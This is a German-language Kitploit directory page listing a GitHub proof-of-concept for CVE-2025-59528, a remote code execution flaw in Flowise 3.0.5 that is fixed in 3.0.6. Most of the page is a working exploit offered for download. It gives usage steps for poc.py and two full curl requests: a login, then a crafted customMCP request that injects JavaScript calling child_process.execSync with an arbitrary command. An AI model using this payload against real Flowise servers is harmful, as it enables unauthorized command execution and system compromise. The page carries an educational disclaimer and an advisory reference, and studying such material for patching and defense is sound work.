Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-59528-PoC — CVE-2025-59528 Proof of Concept | Kitploit
Tools/GitHubGitHub/mananispiwpiw/cve-2025-59528-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubmananispiwpiw/cve-2025-59528-poc

CVE-2025-59528-PoC

CVE-2025-59528 Proof of Concept

Repository anzeigen
141vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-59528 PoC

Python-Proof-of-Concept-Skript zum Auslösen des Flowise-CustomMCP-RCE-Pfads über POST /api/v1/node-load-method/customMCP.

⚠️ Nur für Bildungszwecke und autorisierte Sicherheitsforschung. Das Ausführen dieses Tools gegen Systeme, die Sie nicht besitzen oder für die Sie keine schriftliche Genehmigung zum Testen haben, ist illegal.

Danksagung

  • im-soohyun (Kim SooHyun)

Details

  • PoC für CVE-2025-59528
  • Betroffene Version: Flowise 3.0.5
  • Gepatchte Version: Flowise 3.0.6
  • Referenz: https://github.com/advisories/GHSA-3gcm-f6qx-ff7p

Dateien

  • poc.py: fragt nach Maschinen-URL/IP, optionalem Protokoll, wenn nur eine nackte Host/IP angegeben wurde, E-Mail-Adresse, Passwort und Befehl; meldet sich an, verwendet Cookies erneut, sendet dann eine manipulierte CustomMCP-Anfrage und gibt HTTP-Status, Header und Antwortbody ähnlich wie curl -i aus.

Verwendung

Ausführen:

python3 poc.py

Geben Sie dann Folgendes an:

  • Maschinen-URL/IP, z. B. 10.10.11.10, http://10.10.11.10 oder https://target.example
  • Protokoll, falls nur eine nackte Host/IP eingegeben wurde
  • E-Mail-Adresse
  • Passwort für ein Konto auf der Ziel-Flowise-Instanz
  • Befehl, der auf dem Server ausgeführt werden soll

Entsprechende curl-Befehle

1. Anfrage

curl -i -X POST https://<MACHINE_URL/IP>/api/v1/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"<[email protected]>","password":"<password>"}'

2. Anfrage

curl -i -X POST https://<target>/api/v1/node-load-method/customMCP \
  -H "Content-Type: application/json" \
  -H "x-request-from: internal" \
  -H "Cookie: token=<token>; refreshToken=<refreshToken>; connect.sid=<connect.sid>" \
  -d '{
        "loadMethod":"listActions",
        "inputs":{
          "mcpServerConfig":"({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"<command>\");return 1;})()})"
        }
      }'
Tool herunterladen